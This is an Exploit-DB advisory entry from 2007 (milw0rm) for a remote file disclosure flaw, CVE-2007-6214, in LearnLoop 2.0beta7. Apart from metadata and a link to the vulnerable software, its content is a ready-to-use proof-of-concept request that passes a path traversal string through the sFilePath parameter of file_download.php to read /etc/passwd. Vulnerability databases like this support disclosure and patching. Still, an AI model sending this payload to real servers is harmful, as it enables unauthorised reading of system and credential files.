LearnLoop 2.0beta7 sFilePath Remote File Disclosure Vulnerability

2007-11-29T00:00:00
ID EDB-ID:4680
Type exploitdb
Reporter GoLd_M
Modified 2007-11-29T00:00:00

Description

LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability. CVE-2007-6214. Webapps exploit for php platform

                                        
                                            LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd

# milw0rm.com [2007-11-29]